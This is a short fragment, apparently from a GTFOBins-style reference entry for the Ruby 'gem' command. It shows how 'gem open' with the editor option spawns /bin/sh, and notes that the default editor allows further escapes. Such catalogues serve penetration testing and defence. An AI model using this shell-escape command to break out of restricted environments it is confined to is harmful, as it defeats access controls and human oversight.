- description: This requires the name of an installed gem to be provided (`rdoc` is usually installed).
code: gem open -e "/bin/sh -c /bin/sh" rdoc
- description: This invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (`rdoc` is usually installed).